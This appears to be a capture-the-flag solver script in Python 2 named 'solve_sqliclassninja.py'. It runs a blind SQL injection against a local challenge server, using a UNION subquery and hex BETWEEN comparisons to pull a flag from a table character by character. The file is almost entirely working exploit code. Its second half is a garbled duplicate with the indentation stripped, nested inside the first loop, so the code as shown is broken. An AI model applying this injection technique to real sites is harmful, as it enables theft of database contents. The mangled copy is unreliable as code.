ducnhse130201/solve_sqliclassninja.py

## solve_sqliclassninja.py
import requests

def query(q):
	s = requests.Session()
	url = 'http://localhost:7002/?query1=' + q
	r = s.get(url)
	if r.text.count('Success') == 4:
		return True
	else:
		return False

# -->        select 1 from dual#

table = ''
flag = ''
while True:
	for i in range(33,128):
		a = '0x' + (table + chr(i)).encode('hex')
		b = '0x' + (table + chr(i+1)).encode('hex')
		q = '%0a where (select hex (b) from (select * from (select 1 as a)a join (select 2 as b)b union select * from the_awes0me_flag limit 1 offset 1)aa) between hex ('+ a +') and hex ('+ b +');'
		if query(q):
			table += chr(i)
			print table
			break
	import requests

	def query(q):
	s = requests.Session()
	url = 'http://localhost:7002/?query1=' + q
	r = s.get(url)
	if r.text.count('Success') == 4:
	return True
	else:
	return False

	# --> select 1 from dual#

	table = ''
	flag = ''
	while True:
	for i in range(33,128):
	a = '0x' + (table + chr(i)).encode('hex')
	b = '0x' + (table + chr(i+1)).encode('hex')
	q = '%0a where (select hex (b) from (select * from (select 1 as a)a join (select 2 as b)b union select * from the_awes0me_flag limit 1 offset 1)aa) between hex ('+ a +') and hex ('+ b +');'
	if query(q):
	table += chr(i)
	print table
	break